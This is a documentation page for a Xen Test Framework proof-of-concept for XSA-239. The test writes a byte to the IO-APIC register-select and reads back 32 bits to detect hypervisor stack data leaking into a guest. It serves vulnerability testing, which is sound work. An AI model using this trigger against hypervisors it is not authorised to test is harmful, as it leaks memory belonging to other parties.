Xen Test Framework
main.c
Go to the documentation of this file.
1
18#include <xtf.h>
19
20const char test_title[] = "XSA-239 PoC";
21
22void test_main(void)
23{
24 uint32_t *io_apic_32 = _p(IOAPIC_DEFAULT_BASE);
25 uint8_t *io_apic_8 = _p(IOAPIC_DEFAULT_BASE);
26 unsigned int i;
27
28 /*
29 * Retry several times. It is plausible that the stack rubble happens to
30 * be zeroes.
31 */
32 for ( i = 0; i < 20; ++i )
33 {
34 ACCESS_ONCE(io_apic_8[0]) = 0;
35
36 uint32_t val = ACCESS_ONCE(io_apic_32[0]);
37
38 /*
39 * Cope with an IOAPIC not being present, and the IO being terminated
40 * as ~0u by the default no-op handler.
41 */
42 if ( val != 0 && val != ~0u )
43 {
44 printk("Data leaked via IO_APIC REG_SELECT: %08x\n", val);
45 return xtf_failure("Fail: Vulnerable to XSA-239\n");
46 }
47
48 hypercall_yield();
49 }
50
51 xtf_success("Success: Probably not vulnerable to XSA-239\n");
52}
53
54/*
55 * Local variables:
56 * mode: C
57 * c-file-style: "BSD"
58 * c-basic-offset: 4
59 * tab-width: 4
60 * indent-tabs-mode: nil
61 * End:
62 */
printk
void printk(const char *fmt,...)
Definition: console.c:134
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110
test_title
const char test_title[]
The title of the test.
Definition: main.c:24
hypercall_yield
static void hypercall_yield(void)
Definition: hypercall.h:206
ACCESS_ONCE
#define ACCESS_ONCE(x)
Definition: lib.h:10
IOAPIC_DEFAULT_BASE
#define IOAPIC_DEFAULT_BASE
Definition: io-apic.h:29
_p
#define _p(v)
Express an abitrary integer v as void *.
Definition: numbers.h:48
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
uint32_t
__UINT32_TYPE__ uint32_t
Definition: stdint.h:16
uint8_t
__UINT8_TYPE__ uint8_t
Definition: stdint.h:14
Generated by doxygen 1.9.4